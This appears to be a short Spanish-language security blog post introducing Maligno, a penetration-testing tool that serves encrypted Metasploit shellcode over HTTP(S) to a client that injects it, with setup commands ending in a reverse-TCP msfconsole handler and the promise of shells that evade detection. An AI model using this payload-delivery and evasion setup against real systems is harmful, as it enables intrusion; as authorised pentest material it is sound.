En esta ocasión Maligno no tiene que ver con Chema Alonso ;) Se trata de una herramienta de código abierto de la firma Encripto AS
para servir payloads de Metasploit en un test de intrusión. Es decir,
genera shellcodes con msfvenom y los transmite por HTTP o HTTPS. Eso sí,
el shellcode es cifrado con AES y codificado con Base64 antes de
enviarse. Maligno
tiene también una parte cliente para descargar el payload de Metasploit
cifrado. Una vez que se recibe el shellcode, el cliente lo descodifica,
lo descifra y lo inyecta en la máquina objetivo. Como resultado, obtendremos una sesión de Metasploit evadiendo detecciones... Para instalarlo echa un vistazo a este vídeo: http://www.youtube.com/watch?v=97A0pXWbz6c o sigue los pasos siguientes:
Maligno v1.1 3.- Genera un certificado auto-firmado con el siguiente script: ./certgen.sh 4.- Configura el servidor Maligno ajustando las opciones en server.conf: Echa un vistazo al fichero server.conf.explained 5.- Ejecuta el servidor Maligno: python maligno_srv.py 6.- Genera un cliente: python clientgen.py -i 0 -f server.conf -o my_client.py -i: Índice del payload (payload especificado en el fichero de configuración del server, empezando desde 0) -f: Fichero de configuración del servidor Maligno -o: Fichero de salida donde se escribirá el código del cliente 7.- Manejador de Metasploit Arranca msfconsole con el fichero de recursos generado por Maligno msfconsole -r reverse_tcp_192.168.0.2_4444.rc 8.- Empieza a conseguir shells!